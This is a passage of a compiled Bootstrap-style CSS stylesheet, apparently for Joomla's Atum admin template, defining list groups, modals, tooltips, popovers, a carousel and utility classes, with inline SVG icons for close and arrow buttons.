    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-xl > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-xl > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-xl > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
@media (min-width: 1400px) {
  .list-group-horizontal-xxl {
    flex-direction: row;
  }
  .list-group-horizontal-xxl > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-xxl > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-xxl > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-xxl > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-xxl > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
.list-group-flush {
  border-radius: 0;
}
.list-group-flush > .list-group-item {
  border-width: 0 0 1px;
}
.list-group-flush > .list-group-item:last-child {
  border-bottom-width: 0;
}

.list-group-item-primary {
  color: #0b1c32;
  background-color: #d0d5dd;
}
.list-group-item-primary.list-group-item-action:hover, .list-group-item-primary.list-group-item-action:focus {
  color: #0b1c32;
  background-color: #bbc0c7;
}
.list-group-item-primary.list-group-item-action.active {
  color: #fff;
  background-color: #0b1c32;
  border-color: #0b1c32;
}

.list-group-item-secondary {
  color: #2c3034;
  background-color: #dbdcdd;
}
.list-group-item-secondary.list-group-item-action:hover, .list-group-item-secondary.list-group-item-action:focus {
  color: #2c3034;
  background-color: #c5c6c7;
}
.list-group-item-secondary.list-group-item-action.active {
  color: #fff;
  background-color: #2c3034;
  border-color: #2c3034;
}

.list-group-item-success {
  color: #294b32;
  background-color: #dae5dd;
}
.list-group-item-success.list-group-item-action:hover, .list-group-item-success.list-group-item-action:focus {
  color: #294b32;
  background-color: #c4cec7;
}
.list-group-item-success.list-group-item-action.active {
  color: #fff;
  background-color: #294b32;
  border-color: #294b32;
}

.list-group-item-info {
  color: #193f6e;
  background-color: #d4e1f1;
}
.list-group-item-info.list-group-item-action:hover, .list-group-item-info.list-group-item-action:focus {
  color: #193f6e;
  background-color: #bfcbd9;
}
.list-group-item-info.list-group-item-action.active {
  color: #fff;
  background-color: #193f6e;
  border-color: #193f6e;
}

.list-group-item-warning {
  color: #664808;
  background-color: #fff0d0;
}
.list-group-item-warning.list-group-item-action:hover, .list-group-item-warning.list-group-item-action:focus {
  color: #664808;
  background-color: #e6d8bb;
}
.list-group-item-warning.list-group-item-action.active {
  color: #fff;
  background-color: #664808;
  border-color: #664808;
}

.list-group-item-danger {
  color: #761817;
  background-color: #f3d4d4;
}
.list-group-item-danger.list-group-item-action:hover, .list-group-item-danger.list-group-item-action:focus {
  color: #761817;
  background-color: #dbbfbf;
}
.list-group-item-danger.list-group-item-action.active {
  color: #fff;
  background-color: #761817;
  border-color: #761817;
}

.list-group-item-light {
  color: #636464;
  background-color: #fefefe;
}
.list-group-item-light.list-group-item-action:hover, .list-group-item-light.list-group-item-action:focus {
  color: #636464;
  background-color: #e5e5e5;
}
.list-group-item-light.list-group-item-action.active {
  color: #fff;
  background-color: #636464;
  border-color: #636464;
}

.list-group-item-dark {
  color: #141619;
  background-color: #d3d3d4;
}
.list-group-item-dark.list-group-item-action:hover, .list-group-item-dark.list-group-item-action:focus {
  color: #141619;
  background-color: #bebebf;
}
.list-group-item-dark.list-group-item-action.active {
  color: #fff;
  background-color: #141619;
  border-color: #141619;
}

.list-group-item-atum-link-color {
  color: #193f6e;
  background-color: #d4e1f1;
}
.list-group-item-atum-link-color.list-group-item-action:hover, .list-group-item-atum-link-color.list-group-item-action:focus {
  color: #193f6e;
  background-color: #bfcbd9;
}
.list-group-item-atum-link-color.list-group-item-action.active {
  color: #fff;
  background-color: #193f6e;
  border-color: #193f6e;
}

.list-group-item-atum-text-dark {
  color: #2c3034;
  background-color: #dbdcdd;
}
.list-group-item-atum-text-dark.list-group-item-action:hover, .list-group-item-atum-text-dark.list-group-item-action:focus {
  color: #2c3034;
  background-color: #c5c6c7;
}
.list-group-item-atum-text-dark.list-group-item-action.active {
  color: #fff;
  background-color: #2c3034;
  border-color: #2c3034;
}

.list-group-item-action {
  color: #0b1c32;
  background-color: #d0d5dd;
}
.list-group-item-action.list-group-item-action:hover, .list-group-item-action.list-group-item-action:focus {
  color: #0b1c32;
  background-color: #bbc0c7;
}
.list-group-item-action.list-group-item-action.active {
  color: #fff;
  background-color: #0b1c32;
  border-color: #0b1c32;
}

.list-group-item-error {
  color: #230807;
  background-color: #d8cfce;
}
.list-group-item-error.list-group-item-action:hover, .list-group-item-error.list-group-item-action:focus {
  color: #230807;
  background-color: #c2bab9;
}
.list-group-item-error.list-group-item-action.active {
  color: #fff;
  background-color: #230807;
  border-color: #230807;
}

.list-group-item-alert-success {
  color: #091c14;
  background-color: #cfd5d3;
}
.list-group-item-alert-success.list-group-item-action:hover, .list-group-item-alert-success.list-group-item-action:focus {
  color: #091c14;
  background-color: #bac0be;
}
.list-group-item-alert-success.list-group-item-action.active {
  color: #fff;
  background-color: #091c14;
  border-color: #091c14;
}

.btn-close {
  box-sizing: content-box;
  width: 1em;
  height: 1em;
  padding: 0.25em 0.25em;
  color: #000;
  background: transparent url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23000'%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/1em auto no-repeat;
  border: 0;
  border-radius: 0.25rem;
  opacity: 0.5;
}
.btn-close:hover {
  color: #000;
  text-decoration: none;
  opacity: 0.75;
}
.btn-close:focus {
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
  opacity: 1;
}
.btn-close:disabled, .btn-close.disabled {
  pointer-events: none;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  opacity: 0.25;
}

.btn-close-white {
  -webkit-filter: invert(1) grayscale(100%) brightness(200%);
          filter: invert(1) grayscale(100%) brightness(200%);
}

.modal {
  position: fixed;
  top: 0;
  left: 0;
  z-index: 1050;
  display: none;
  width: 100%;
  height: 100%;
  overflow-x: hidden;
  overflow-y: auto;
  outline: 0;
}

.modal-dialog {
  position: relative;
  width: auto;
  margin: 0.5rem;
  pointer-events: none;
}
.modal.fade .modal-dialog {
  transition: -webkit-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
  transition: transform 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -webkit-transform: translate(0, -50px);
          transform: translate(0, -50px);
}
@media (prefers-reduced-motion: reduce) {
  .modal.fade .modal-dialog {
    transition: none;
  }
}
.modal.show .modal-dialog {
  -webkit-transform: none;
          transform: none;
}
.modal.modal-static .modal-dialog {
  -webkit-transform: scale(1.02);
          transform: scale(1.02);
}

.modal-dialog-scrollable {
  height: calc(100% - 1rem);
}
.modal-dialog-scrollable .modal-content {
  max-height: 100%;
  overflow: hidden;
}
.modal-dialog-scrollable .modal-body {
  overflow-y: auto;
}

.modal-dialog-centered {
  display: flex;
  align-items: center;
  min-height: calc(100% - 1rem);
}

.modal-content {
  position: relative;
  display: flex;
  flex-direction: column;
  width: 100%;
  pointer-events: auto;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0.3rem;
  outline: 0;
}

.modal-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  z-index: 1040;
  width: 100vw;
  height: 100vh;
  background-color: #000;
}
.modal-backdrop.fade {
  opacity: 0;
}
.modal-backdrop.show {
  opacity: 0.5;
}

.modal-header {
  display: flex;
  flex-shrink: 0;
  align-items: center;
  justify-content: space-between;
  padding: 1rem 1rem;
  border-bottom: 1px solid #dee2e6;
  border-top-left-radius: calc(0.3rem - 1px);
  border-top-right-radius: calc(0.3rem - 1px);
}
.modal-header .btn-close {
  padding: 0.5rem 0.5rem;
  margin: -0.5rem -0.5rem -0.5rem auto;
}

.modal-title {
  margin-bottom: 0;
  line-height: 1.5;
}

.modal-body {
  position: relative;
  flex: 1 1 auto;
  padding: 1rem;
}

.modal-footer {
  display: flex;
  flex-wrap: wrap;
  flex-shrink: 0;
  align-items: center;
  justify-content: flex-end;
  padding: 0.75rem;
  border-top: 1px solid #dee2e6;
  border-bottom-right-radius: calc(0.3rem - 1px);
  border-bottom-left-radius: calc(0.3rem - 1px);
}
.modal-footer > * {
  margin: 0.25rem;
}

@media (min-width: 576px) {
  .modal-dialog {
    max-width: 500px;
    margin: 1.75rem auto;
  }

  .modal-dialog-scrollable {
    height: calc(100% - 3.5rem);
  }

  .modal-dialog-centered {
    min-height: calc(100% - 3.5rem);
  }

  .modal-sm {
    max-width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg,
.modal-xl {
    max-width: 800px;
  }
}
@media (min-width: 1200px) {
  .modal-xl {
    max-width: 1140px;
  }
}
.modal-fullscreen {
  width: 100vw;
  max-width: none;
  height: 100%;
  margin: 0;
}
.modal-fullscreen .modal-content {
  height: 100%;
  border: 0;
  border-radius: 0;
}
.modal-fullscreen .modal-header {
  border-radius: 0;
}
.modal-fullscreen .modal-body {
  overflow-y: auto;
}
.modal-fullscreen .modal-footer {
  border-radius: 0;
}

@media (max-width: 575.98px) {
  .modal-fullscreen-sm-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-sm-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-sm-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-sm-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-sm-down .modal-footer {
    border-radius: 0;
  }
}
@media (max-width: 767.98px) {
  .modal-fullscreen-md-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-md-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-md-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-md-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-md-down .modal-footer {
    border-radius: 0;
  }
}
@media (max-width: 991.98px) {
  .modal-fullscreen-lg-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-lg-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-lg-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-lg-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-lg-down .modal-footer {
    border-radius: 0;
  }
}
@media (max-width: 1199.98px) {
  .modal-fullscreen-xl-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-xl-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-xl-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-xl-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-xl-down .modal-footer {
    border-radius: 0;
  }
}
@media (max-width: 1399.98px) {
  .modal-fullscreen-xxl-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-xxl-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-xxl-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-xxl-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-xxl-down .modal-footer {
    border-radius: 0;
  }
}
.tooltip {
  position: absolute;
  z-index: 1070;
  display: block;
  margin: 0;
  font-family: var(--font-sans-serif);
  font-style: normal;
  font-weight: 400;
  line-height: 1.5;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  white-space: normal;
  line-break: auto;
  font-size: 0.8rem;
  word-wrap: break-word;
  opacity: 0;
}
.tooltip.show {
  opacity: 0.9;
}
.tooltip .tooltip-arrow {
  position: absolute;
  display: block;
  width: 0.8rem;
  height: 0.4rem;
}
.tooltip .tooltip-arrow::before {
  position: absolute;
  content: "";
  border-color: transparent;
  border-style: solid;
}

.bs-tooltip-top, .bs-tooltip-auto[data-popper-placement^=top] {
  padding: 0.4rem 0;
}
.bs-tooltip-top .tooltip-arrow, .bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow {
  bottom: 0;
}
.bs-tooltip-top .tooltip-arrow::before, .bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow::before {
  top: -1px;
  border-width: 0.4rem 0.4rem 0;
  border-top-color: #000;
}

.bs-tooltip-end, .bs-tooltip-auto[data-popper-placement^=right] {
  padding: 0 0.4rem;
}
.bs-tooltip-end .tooltip-arrow, .bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow {
  left: 0;
  width: 0.4rem;
  height: 0.8rem;
}
.bs-tooltip-end .tooltip-arrow::before, .bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow::before {
  right: -1px;
  border-width: 0.4rem 0.4rem 0.4rem 0;
  border-right-color: #000;
}

.bs-tooltip-bottom, .bs-tooltip-auto[data-popper-placement^=bottom] {
  padding: 0.4rem 0;
}
.bs-tooltip-bottom .tooltip-arrow, .bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow {
  top: 0;
}
.bs-tooltip-bottom .tooltip-arrow::before, .bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow::before {
  bottom: -1px;
  border-width: 0 0.4rem 0.4rem;
  border-bottom-color: #000;
}

.bs-tooltip-start, .bs-tooltip-auto[data-popper-placement^=left] {
  padding: 0 0.4rem;
}
.bs-tooltip-start .tooltip-arrow, .bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow {
  right: 0;
  width: 0.4rem;
  height: 0.8rem;
}
.bs-tooltip-start .tooltip-arrow::before, .bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow::before {
  left: -1px;
  border-width: 0.4rem 0 0.4rem 0.4rem;
  border-left-color: #000;
}

.tooltip-inner {
  max-width: 200px;
  padding: 0.25rem 0.5rem;
  color: #fff;
  text-align: center;
  background-color: #000;
  border-radius: 0.25rem;
}

.popover {
  position: absolute;
  top: 0;
  left: 0 /* rtl:ignore */;
  z-index: 1060;
  display: block;
  max-width: 276px;
  font-family: var(--font-sans-serif);
  font-style: normal;
  font-weight: 400;
  line-height: 1.5;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  white-space: normal;
  line-break: auto;
  font-size: 0.8rem;
  word-wrap: break-word;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0.3rem;
}
.popover .popover-arrow {
  position: absolute;
  display: block;
  width: 1rem;
  height: 0.5rem;
}
.popover .popover-arrow::before, .popover .popover-arrow::after {
  position: absolute;
  display: block;
  content: "";
  border-color: transparent;
  border-style: solid;
}

.bs-popover-top > .popover-arrow, .bs-popover-auto[data-popper-placement^=top] > .popover-arrow {
  bottom: calc(-0.5rem - 1px);
}
.bs-popover-top > .popover-arrow::before, .bs-popover-auto[data-popper-placement^=top] > .popover-arrow::before {
  bottom: 0;
  border-width: 0.5rem 0.5rem 0;
  border-top-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-top > .popover-arrow::after, .bs-popover-auto[data-popper-placement^=top] > .popover-arrow::after {
  bottom: 1px;
  border-width: 0.5rem 0.5rem 0;
  border-top-color: #fff;
}

.bs-popover-end > .popover-arrow, .bs-popover-auto[data-popper-placement^=right] > .popover-arrow {
  left: calc(-0.5rem - 1px);
  width: 0.5rem;
  height: 1rem;
}
.bs-popover-end > .popover-arrow::before, .bs-popover-auto[data-popper-placement^=right] > .popover-arrow::before {
  left: 0;
  border-width: 0.5rem 0.5rem 0.5rem 0;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-end > .popover-arrow::after, .bs-popover-auto[data-popper-placement^=right] > .popover-arrow::after {
  left: 1px;
  border-width: 0.5rem 0.5rem 0.5rem 0;
  border-right-color: #fff;
}

.bs-popover-bottom > .popover-arrow, .bs-popover-auto[data-popper-placement^=bottom] > .popover-arrow {
  top: calc(-0.5rem - 1px);
}
.bs-popover-bottom > .popover-arrow::before, .bs-popover-auto[data-popper-placement^=bottom] > .popover-arrow::before {
  top: 0;
  border-width: 0 0.5rem 0.5rem 0.5rem;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-bottom > .popover-arrow::after, .bs-popover-auto[data-popper-placement^=bottom] > .popover-arrow::after {
  top: 1px;
  border-width: 0 0.5rem 0.5rem 0.5rem;
  border-bottom-color: #fff;
}
.bs-popover-bottom .popover-header::before, .bs-popover-auto[data-popper-placement^=bottom] .popover-header::before {
  position: absolute;
  top: 0;
  left: 50%;
  display: block;
  width: 1rem;
  margin-left: -0.5rem;
  content: "";
  border-bottom: 1px solid #f0f0f0;
}

.bs-popover-start > .popover-arrow, .bs-popover-auto[data-popper-placement^=left] > .popover-arrow {
  right: calc(-0.5rem - 1px);
  width: 0.5rem;
  height: 1rem;
}
.bs-popover-start > .popover-arrow::before, .bs-popover-auto[data-popper-placement^=left] > .popover-arrow::before {
  right: 0;
  border-width: 0.5rem 0 0.5rem 0.5rem;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-start > .popover-arrow::after, .bs-popover-auto[data-popper-placement^=left] > .popover-arrow::after {
  right: 1px;
  border-width: 0.5rem 0 0.5rem 0.5rem;
  border-left-color: #fff;
}

.popover-header {
  padding: 0.5rem 1rem;
  margin-bottom: 0;
  font-size: 1rem;
  color: var(--template-bg-dark);
  background-color: #f0f0f0;
  border-bottom: 1px solid rgba(0, 0, 0, 0.2);
  border-top-left-radius: calc(0.3rem - 1px);
  border-top-right-radius: calc(0.3rem - 1px);
}
.popover-header:empty {
  display: none;
}

.popover-body {
  padding: 1rem 1rem;
  color: var(--template-text-dark);
}

.carousel {
  position: relative;
}

.carousel.pointer-event {
  touch-action: pan-y;
}

.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}
.carousel-inner::after {
  display: block;
  clear: both;
  content: "";
}

.carousel-item {
  position: relative;
  display: none;
  float: left;
  width: 100%;
  margin-right: -100%;
  -webkit-backface-visibility: hidden;
          backface-visibility: hidden;
  transition: -webkit-transform 0.6s ease-in-out;
  transition: transform 0.6s ease-in-out;
  transition: transform 0.6s ease-in-out, -webkit-transform 0.6s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .carousel-item {
    transition: none;
  }
}

.carousel-item.active,
.carousel-item-next,
.carousel-item-prev {
  display: block;
}

/* rtl:begin:ignore */
.carousel-item-next:not(.carousel-item-start),
.active.carousel-item-end {
  -webkit-transform: translateX(100%);
          transform: translateX(100%);
}

.carousel-item-prev:not(.carousel-item-end),
.active.carousel-item-start {
  -webkit-transform: translateX(-100%);
          transform: translateX(-100%);
}

/* rtl:end:ignore */
.carousel-fade .carousel-item {
  opacity: 0;
  transition-property: opacity;
  -webkit-transform: none;
          transform: none;
}
.carousel-fade .carousel-item.active,
.carousel-fade .carousel-item-next.carousel-item-start,
.carousel-fade .carousel-item-prev.carousel-item-end {
  z-index: 1;
  opacity: 1;
}
.carousel-fade .active.carousel-item-start,
.carousel-fade .active.carousel-item-end {
  z-index: 0;
  opacity: 0;
  transition: opacity 0s 0.6s;
}
@media (prefers-reduced-motion: reduce) {
  .carousel-fade .active.carousel-item-start,
.carousel-fade .active.carousel-item-end {
    transition: none;
  }
}

.carousel-control-prev,
.carousel-control-next {
  position: absolute;
  top: 0;
  bottom: 0;
  z-index: 1;
  display: flex;
  align-items: center;
  justify-content: center;
  width: 15%;
  padding: 0;
  color: #fff;
  text-align: center;
  background: none;
  border: 0;
  opacity: 0.5;
  transition: opacity 0.15s ease;
}
@media (prefers-reduced-motion: reduce) {
  .carousel-control-prev,
.carousel-control-next {
    transition: none;
  }
}
.carousel-control-prev:hover, .carousel-control-prev:focus,
.carousel-control-next:hover,
.carousel-control-next:focus {
  color: #fff;
  text-decoration: none;
  outline: 0;
  opacity: 0.9;
}

.carousel-control-prev {
  left: 0;
}

.carousel-control-next {
  right: 0;
}

.carousel-control-prev-icon,
.carousel-control-next-icon {
  display: inline-block;
  width: 2rem;
  height: 2rem;
  background-repeat: no-repeat;
  background-position: 50%;
  background-size: 100% 100%;
}

/* rtl:options: {
  "autoRename": true,
  "stringMap":[ {
    "name"    : "prev-next",
    "search"  : "prev",
    "replace" : "next"
  } ]
} */
.carousel-control-prev-icon {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3e%3cpath d='M11.354 1.646a.5.5 0 0 1 0 .708L5.707 8l5.647 5.646a.5.5 0 0 1-.708.708l-6-6a.5.5 0 0 1 0-.708l6-6a.5.5 0 0 1 .708 0z'/%3e%3c/svg%3e");
}

.carousel-control-next-icon {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3e%3cpath d='M4.646 1.646a.5.5 0 0 1 .708 0l6 6a.5.5 0 0 1 0 .708l-6 6a.5.5 0 0 1-.708-.708L10.293 8 4.646 2.354a.5.5 0 0 1 0-.708z'/%3e%3c/svg%3e");
}

.carousel-indicators {
  position: absolute;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 2;
  display: flex;
  justify-content: center;
  padding: 0;
  margin-right: 15%;
  margin-bottom: 1rem;
  margin-left: 15%;
  list-style: none;
}
.carousel-indicators [data-bs-target] {
  box-sizing: content-box;
  flex: 0 1 auto;
  width: 30px;
  height: 3px;
  padding: 0;
  margin-right: 3px;
  margin-left: 3px;
  text-indent: -999px;
  cursor: pointer;
  background-color: #fff;
  background-clip: padding-box;
  border: 0;
  border-top: 10px solid transparent;
  border-bottom: 10px solid transparent;
  opacity: 0.5;
  transition: opacity 0.6s ease;
}
@media (prefers-reduced-motion: reduce) {
  .carousel-indicators [data-bs-target] {
    transition: none;
  }
}
.carousel-indicators .active {
  opacity: 1;
}

.carousel-caption {
  position: absolute;
  right: 15%;
  bottom: 1.25rem;
  left: 15%;
  padding-top: 1.25rem;
  padding-bottom: 1.25rem;
  color: #fff;
  text-align: center;
}

.carousel-dark .carousel-control-prev-icon,
.carousel-dark .carousel-control-next-icon {
  -webkit-filter: invert(1) grayscale(100);
          filter: invert(1) grayscale(100);
}
.carousel-dark .carousel-indicators [data-bs-target] {
  background-color: #000;
}
.carousel-dark .carousel-caption {
  color: #000;
}

.align-baseline {
  vertical-align: baseline !important;
}

.align-top {
  vertical-align: top !important;
}

.align-middle {
  vertical-align: middle !important;
}

.align-bottom {
  vertical-align: bottom !important;
}

.align-text-bottom {
  vertical-align: text-bottom !important;
}

.align-text-top {
  vertical-align: text-top !important;
}

.float-start {
  float: left !important;
}

.float-end {
  float: right !important;
}

.float-none {
  float: none !important;
}

.overflow-auto {
  overflow: auto !important;
}

.overflow-hidden {
  overflow: hidden !important;
}

.overflow-visible {
  overflow: visible !important;
}

.overflow-scroll {
  overflow: scroll !important;
}

.d-inline {
  display: inline !important;
}

.d-inline-block {
  display: inline-block !important;
}

.d-block {
  display: block !important;
}

.d-grid {
  display: grid !important;
}

.d-table {
  display: table !important;
}

.d-table-row {
  display: table-row !important;
}

.d-table-cell {
  display: table-cell !important;
}

.d-flex {
  display: flex !important;
}

.d-inline-flex {
  display: inline-flex !important;
}

.d-none {
  display: none !important;
}

.shadow {
  box-shadow: 0 0.5rem 1rem rgba(0, 0, 0, 0.15) !important;
}

.shadow-sm {
  box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.075) !important;
}

.shadow-lg {
  box-shadow: 0 1rem 3rem rgba(0, 0, 0, 0.175) !important;
}

.shadow-none {
  box-shadow: none !important;
}

.position-static {
  position: static !important;
}

.position-relative {
  position: relative !important;
}

.position-absolute {
  position: absolute !important;
}

.position-fixed {
  position: fixed !important;
}

.position-sticky {
  position: sticky !important;
}

.top-0 {
  top: 0 !important;
}

.top-50 {
  top: 50% !important;
}

.top-100 {
  top: 100% !important;
}

.bottom-0 {
  bottom: 0 !important;
}

.bottom-50 {
  bottom: 50% !important;
}

.bottom-100 {
  bottom: 100% !important;
}

.start-0 {
  left: 0 !important;
}

.start-50 {
  left: 50% !important;
}

.start-100 {
  left: 100% !important;
}

.end-0 {
  right: 0 !important;
}

.end-50 {
  right: 50% !important;
}

.end-100 {
  right: 100% !important;
}

.translate-middle {
  -webkit-transform: translate(-50%, -50%) !important;
          transform: translate(-50%, -50%) !important;
}

.translate-middle-x {
  -webkit-transform: translateX(-50%) !important;
          transform: translateX(-50%) !important;
}

.translate-middle-y {
  -webkit-transform: translateY(-50%) !important;
          transform: translateY(-50%) !important;
}

.border {
  border: 1px solid #dee2e6 !important;
}

.border-0 {
  border: 0 !important;
}

.border-top {
  border-top: 1px solid #dee2e6 !important;
}

.border-top-0 {
  border-top: 0 !important;
}

.border-end {
  border-right: 1px solid #dee2e6 !important;
}

.border-end-0 {
  border-right: 0 !important;
}

.border-bottom {
  border-bottom: 1px solid #dee2e6 !important;
}

.border-bottom-0 {
  border-bottom: 0 !important;
}

.border-start {
  border-left: 1px solid #dee2e6 !important;
}

.border-start-0 {
  border-left: 0 !important;
}

.border-primary {
  border-color: #132f53 !important;
}

.border-secondary {
  border-color: #495057 !important;
}

.border-success {
  border-color: #457d54 !important;
}

.border-info {
  border-color: #2a69b8 !important;
}

.border-warning {
  border-color: #ffb514 !important;
}

.border-danger {
  border-color: #c52827 !important;
}

.border-light {
  border-color: #f8f9fa !important;
}

.border-dark {
  border-color: #212529 !important;
}

.border-atum-link-color {
  border-color: #2a69b8 !important;
}

.border-atum-text-dark {
  border-color: #495057 !important;
}

.border-action {
  border-color: #132f53 !important;
}

.border-error {
  border-color: #3b0d0c !important;
}

.border-alert-success {
  border-color: #0f2f21 !important;
}

.border-white {
  border-color: #fff !important;
}

.border-1 {
  border-width: 1px !important;
}

.border-2 {
  border-width: 2px !important;
}

.border-3 {
  border-width: 3px !important;
}

.border-4 {
  border-width: 4px !important;
}

.border-5 {
  border-width: 5px !important;
}

.w-25 {
  width: 25% !important;
}

.w-50 {
  width: 50% !important;
}

.w-75 {
  width: 75% !important;
}

.w-100 {
  width: 100% !important;
}

.w-auto {
  width: auto !important;
}

.mw-100 {
  max-width: 100% !important;
}

.vw-100 {
  width: 100vw !important;
}

.min-vw-100 {
  min-width: 100vw !important;
}

.h-25 {
  height: 25% !important;
}

.h-50 {
  height: 50% !important;
}

.h-75 {
  height: 75% !important;
}

.h-100 {
  height: 100% !important;
}

.h-auto {
  height: auto !important;
}

.mh-100 {
  max-height: 100% !important;
}

.vh-100 {
  height: 100vh !important;
}

.min-vh-100 {
  min-height: 100vh !important;
}

.flex-fill {
  flex: 1 1 auto !important;
}

.flex-row {
  flex-direction: row !important;
}

.flex-column {
  flex-direction: column !important;
}

.flex-row-reverse {
  flex-direction: row-reverse !important;
}

.flex-column-reverse {
  flex-direction: column-reverse !important;
}

.flex-grow-0 {
  flex-grow: 0 !important;
}

.flex-grow-1 {
  flex-grow: 1 !important;
}

.flex-shrink-0 {
  flex-shrink: 0 !important;
}

.flex-shrink-1 {
  flex-shrink: 1 !important;
}

.flex-wrap {
  flex-wrap: wrap !important;
}

.flex-nowrap {
  flex-wrap: nowrap !important;
}

.flex-wrap-reverse {
  flex-wrap: wrap-reverse !important;
}

.gap-0 {
  gap: 0 !important;
}

.gap-1 {
  gap: 0.25rem !important;
}

.gap-2 {
  gap: 0.5rem !important;
}

.gap-3 {
  gap: 1rem !important;
}

.gap-4 {
  gap: 1.5rem !important;
}

.gap-5 {
  gap: 3rem !important;
}

.justify-content-start {
  justify-content: flex-start !important;
}

.justify-content-end {
  justify-content: flex-end !important;
}

.justify-content-center {
  justify-content: center !important;
}

.justify-content-between {
  justify-content: space-between !important;
}

.justify-content-around {
  justify-content: space-around !important;
}

.justify-content-evenly {
  justify-content: space-evenly !important;
}

.align-items-start {
  align-items: flex-start !important;
}

.align-items-end {
  align-items: flex-end !important;
}

.align-items-center {
  align-items: center !important;
}

.align-items-baseline {
  align-items: baseline !important;
}

.align-items-stretch {
  align-items: stretch !important;
}

.align-content-start {
  align-content: flex-start !important;
}

.align-content-end {
  align-content: flex-end !important;
}

.align-content-center {
  align-content: center !important;
}

.align-content-between {
  align-content: space-between !important;
}

.align-content-around {
  align-content: space-around !important;
}

.align-content-stretch {
  align-content: stretch !important;
}

.align-self-auto {
  align-self: auto !important;
}

.align-self-start {
  align-self: flex-start !important;
}

.align-self-end {
  align-self: flex-end !important;
}

.align-self-center {
  align-self: center !important;
}

.align-self-baseline {
  align-self: baseline !important;
}

.align-self-stretch {
  align-self: stretch !important;
}

.order-first {
  order: -1 !important;
}

.order-0 {
  order: 0 !important;
}

.order-1 {
  order: 1 !important;
}

.order-2 {
  order: 2 !important;
}

.order-3 {
  order: 3 !important;
}

.order-4 {
  order: 4 !important;
}

.order-5 {
  order: 5 !important;
}

.order-last {
  order: 6 !important;
}

.m-0 {
  margin: 0 !important;
}

.m-1 {
  margin: 0.25rem !important;
}

.m-2 {
  margin: 0.5rem !important;
}

.m-3 {
